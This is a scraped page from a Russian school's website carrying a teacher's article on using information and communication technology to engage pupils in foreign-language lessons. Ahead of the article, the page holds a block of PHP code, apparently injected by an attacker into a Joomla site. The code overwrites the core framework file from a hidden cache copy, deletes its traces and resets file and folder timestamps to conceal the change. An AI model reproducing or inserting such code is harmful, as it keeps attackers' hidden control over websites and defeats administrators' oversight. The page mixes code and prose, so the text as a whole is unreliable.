$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Активизация познавательной деятельности учащихся на уроках иностранного языка посредством применения ИКТ

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 210392

На сайте

Сейчас 20 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Активизация познавательной деятельности учащихся на уроках иностранного языка посредством применения ИКТ

Активизация познавательной деятельности учащихся на уроках иностранного языка посредством применения информационно-коммуникационных технологий

Подготовила учитель иностранного языка Тулюпа Ю.В.

Время бежит, и естественно в преподавании происходят большие изменения. Чтобы уроки иностранного языка были интересны ученикам, нам учителям приходиться изучать новые методы, работать с новыми методами. Мотивировать детей нужно применяя новые методы работы, технологии, которые развивают способности учащихся. Одной из таких технологий является ИКТ (информационно - коммуникационные технологии). В кабинете иностранного языка имеется и проектор и компьютер. Это во многом облегчает использование ИКТ на уроках. Хочу поделиться опытом, который может быть полезным в учебном процессе. Темой самообразования, над которой я работаю с 2014 - 2015 учебного года является: «Активизация познавательной деятельности учащихся при изучении иностранного языка посредством применения ИКТ.

Учитель иностранного языка должен постоянно удивлять, увлекать и организовывать учащихся на работу. Кроме того на своих уроках я использую тексты, учебник, рабочую тетрадь к УМК, репродукции, а также к каждому УМК в комплект входят видео материал. Большую помощь в решении этой проблемы могут оказать ИКТ, которые дают возможность оживить урок, вызвать интерес к предметам. Сейчас учащиеся уже в начальных классах умеют пользоваться компьютером, поэтому с 1 класса я, активно использую ИКТ, развиваю в учащихся умения работать с необходимыми в повседневной жизни информационными системами. На уроках иностранного языка школьники самостоятельно учатся обрабатывать информацию, что развивает у них умение принимать нужное решение или предлагать другое решение в определенной ситуации, развивает умение проводить исследовательскую деятельность. Использование этой технологии открывает для меня как учителя новые методические возможности подготовки и проведения уроков иностранного языка. Также применение ИКТ повышает качество обучения, позволяет формировать культуру умственного труда, развивает внимание, творческую активность, дисциплинированность школьников.

В связи с этим учащиеся должны уметь:

самостоятельно заниматься своим обучением и получать нужную информацию;

уметь работать в группе и принимать решения;

использовать информационно - коммуникационные технологии.

Опираясь на теорию активизации познавательной деятельности школьников и ИКТ, я определила основную цель своего опыта:

создание условий для активизации познавательной деятельности учащихся посредством использования ИКТ на уроках иностранного языка.

Для достижения поставленной цели мною определены следующие задачи:

Способствовать созданию информационно - коммуникационной среды на уроках и во внеурочной деятельности.

Развивать мотивацию и интерес к иностранному языку через использование ИКТ.

Уметь работать в тесном сотрудничестве, коллективно, совместно с учителями.

Внедрять ИКТ для развития познавательного интереса учащихся, формирования логического мышления, развития рефлексии.

Повышать уровень качества знаний.

Воспитывать у учащихся познавательную активность, умение работать с дополнительной литературой, используя возможности компьютера, Интернета.

Применение средств ИКТ на уроках – эффективный метод формирования активизации познавательной деятельности. Использование компьютеров делает урок очень интересным, учащиеся с увлечением работают на таких уроках. От того, какой тип урока я выбираю, зависит как я буду использовать ИКТ в своей работе. Эти методы позволяют охватить почти все стороны учебного материала, заинтересовать учеников.

Используя компьютер, я имею большие возможности в изготовлении наглядностей к каждому уроку, учитывая особенности класса и даже индивидуальные особенности отдельных детей. За урок можно не только изучить новый материал, но также закрепить его, отработать практические навыки.

С использование компьютеров теперь у нас есть возможность заранее подготовить весь необходимый материал, расположить его в нужной последовательности и поместить на слайды. Качество изображения на слайдах на много лучше, чем на классной доске, а я , освобождаясь от постоянной работы у доски, имею возможность больше внимания уделить ученикам. Презентации оживляют урок, внося игровые моменты. Презентация - занимательна форма подготовки творческого задания. При подготовке презентации для закрепления материала на уроке используем прием кластер, который помогает обобщать знания учащихся по определенной теме. Этот приём позволяет учителям научить учеников самих добывать информацию, развивает самопознание и самовыражение личности, развивает способность к самостоятельной работе с информацией любой сложности, формирует у учащихся навыки самообразования, организовывается групповая работа на уроке, развивается партнерство.

На уроках иностранного языка ученики с помощью ресурсов Интернета выполняют задания:

творческие: сочинения, рисунки, фотографии,

исследовательские: создают проекты, составляют для обобщения таблицы, алгоритмы действий, схемы, кластеры. При использовании мультимедийных технологий знания приобретаются по разным каналам восприятия, поэтому лучше усваиваются, запоминаются на более долгий срок.

Конечно, не следует, что теперь уроки надо проводить только с использованием ИКТ. Живое слово учителя иностранного языка никогда не заменить. Учитель может и должен использовать разнообразные технологии обучения, например, на своих уроках для активизации познавательной деятельности учащихся я использую не только информационно - коммуникационные технологии, но и личностно ориентированное обучение, проблемное обучение, проектно - исследовательскую деятельность, технологию сотрудничества, и использую здоровье сберегающие технологии. Чтобы ученик занимался хорошо, нужно его увлечь. Действительно, если ученик увлечен чем - либо, то он проявляет значительно больше настойчивости, терпения, упорства в преодолении трудностей, чем тот, у которого интерес отсутствует. Очень важно пробудить у учащихся положительное отношение к учебной работе. Поэтому большое внимание уделяется организации познавательной деятельности.